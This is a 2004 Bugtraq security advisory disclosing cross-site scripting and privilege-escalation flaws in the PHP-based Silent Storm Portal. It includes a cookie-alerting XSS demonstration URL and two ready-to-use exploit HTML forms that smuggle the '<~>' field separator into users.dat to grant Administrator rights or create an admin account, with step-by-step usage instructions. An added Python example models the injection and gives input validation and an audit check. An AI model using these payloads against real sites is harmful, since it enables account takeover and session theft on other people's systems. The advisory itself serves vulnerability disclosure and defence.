List: bugtraq
Subject: Multiple Vulnerabilities in Silent Storm Portal
From: R00tCr4ck <root () cyberspy ! org>
Date: 2004-09-30 11:57:54
Message-ID: 20040930115754.15459.qmail () www ! securityfocus ! com
#####################################
# CHT Security Research-2004 #
# http://www.CyberSpy.Org #
# Turkey #
#####################################
Software:
Silent Storm Portal
Web Site:
http://www.silent-storm.co.uk/ssp/
Affected Version(s):
2.1, 2.2
Description:
Silent Storm Portal is a PHP-based portal system. It requires PHP4 or above; no MySQL is needed.
Multiple Vulnerabilities in Silent Storm Portal:
Cross-Site Scripting Vulnerability:
Silent Storm Portal is prone to cross-site scripting attacks. It is possible to construct a link containing arbitrary script code to a website running Silent Storm Portal. When a user browses the link, the script code is executed in the user's browser in the context of the site using the Portal. The impact of this issue is that the attacker is able to hijack a legitimate web user's session by stealing cookie-based authentication credentials.
Demonstration:
http://www.victim.com/index.php?module=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
Unauthorized Administrative Access Vulnerability:
Silent Storm Portal stores all account information, including usernames and passwords, in the users.dat file. This is a plaintext file stored in the db directory. There is a flaw in the profile.php file which could allow normal members to gain escalated privileges. The issue occurs due to insufficient sanitization of user-supplied data, which allows the field separator sequence used in users.dat (<~>) to be injected into the file. Submitting an e-mail address carrying an evil level code via the profile module injects an Administrator level value into the database file and escalates the current account to Administrator privileges.
Demonstration:
Register a user account, then log in and run exploit.html.
---exploit.html----
<form method="post" action="http://www.victim.com/index.php?module=../../profile">
<input type="text" name="mail" value="any@mail.com"><br>
<input type="hidden" name="mail" value="<~>1<~>">
<input type="submit" name="post" value="Get Admin!">
</form>
---/exploit.html---
That's All!
What Happened?
The 3rd line of exploit.html injected the Administrator level "1" into the database file.
(1: Administrator, 2: Normal User.)
Examples from the database file:
Before exploiting (level field = 2, Normal User):
evilaccount<~>password<~>any@mail.com<~>2<~><~><~><~><~>
After exploiting (injected level field = 1, Administrator):
evilaccount<~>password<~>any@mail.com<~>1<~><~>2<~><~><~><~><~><~><~>
You will get the "Updated Your Profile Sucessfuly !" message after submitting exploit.html. That's all! Log out and log back in with your username/password, then click the "Admin Panel" link (index.php?module=../../apanel).
Now you have full Administrator privileges.
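How a field separator smuggled into one column shifts the level column, and the two defensive checks this calls for (reject the separator in user input; audit users.dat for records whose field count has drifted), as an added Python example that is not code from the advisory or from Silent Storm Portal. The field names and the expected field count of 9 are assumptions read off the sample records above, not the portal's real schema.

```python
# Added example, not code from the advisory or from Silent Storm Portal.
# It models the users.dat layout the advisory's sample records show: fields
# separated by "<~>", account level in the fourth field (1 = Administrator,
# 2 = Normal User). The field names and the expected field count (9, taken
# from the untouched sample record) are assumptions, not the portal's schema.
DELIM = "<~>"
LEADING_FIELDS = ("user", "password", "mail", "level")
EXPECTED_FIELDS = 9

# Constructed sample lines, copied from the advisory's before/after records.
BEFORE = "evilaccount<~>password<~>any@mail.com<~>2<~><~><~><~><~>"
AFTER = "evilaccount<~>password<~>any@mail.com<~>1<~><~>2<~><~><~><~><~><~><~>"


def split_record(line):
    """Split one users.dat line into its positional fields."""
    return line.rstrip("\n").split(DELIM)


def parse_record(line):
    """Name the leading fields the way a positional reader of users.dat would.
    A delimiter smuggled into the mail field shifts everything after it."""
    return dict(zip(LEADING_FIELDS, split_record(line)))


def validate_user_field(value):
    """Mitigation: refuse user-supplied input that carries a field or record
    separator, so it can never rewrite a neighbouring column."""
    if DELIM in value or "\n" in value:
        raise ValueError("field separator not allowed in user input")
    return value


def update_mail(line, new_mail):
    """Rebuild a record with a new mail field; only column 3 may change."""
    parts = split_record(line)
    parts[2] = validate_user_field(new_mail)
    return DELIM.join(parts)


def audit_users_dat(lines, expected=EXPECTED_FIELDS):
    """Detection: flag records whose field count drifted (injected separators)
    and every record that carries Administrator level, for manual review."""
    findings = []
    for n, line in enumerate(lines, 1):
        fields = parse_record(line)
        count = len(split_record(line))
        if count != expected:
            findings.append((n, "field count %d != %d" % (count, expected)))
        if fields.get("level") == "1":
            findings.append((n, "Administrator level for %s" % fields["user"]))
    return findings
```

Running audit_users_dat over the two sample records flags only the tampered one, twice: once for its 13 fields and once for its Administrator level.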
Here is another form that creates an Administrator account directly on the victim's portal:
---exploit2.html----
<form method="post" action="http://www.victim.com/index.php?module=../../Home">
User:<input type="text" name="usr" size="10"><br>
Pass:<input type="password" name="pas" size="10"><br>
<input type=hidden name="ema" value="any@mail.com<~>1<~>"><br>
<input type="submit" name="reg" value="Create Admin!">
</form>
---/exploit2.html---
----------------------------
The original article can be found at:
http://www.CyberSpy.Org
(Turkish Language)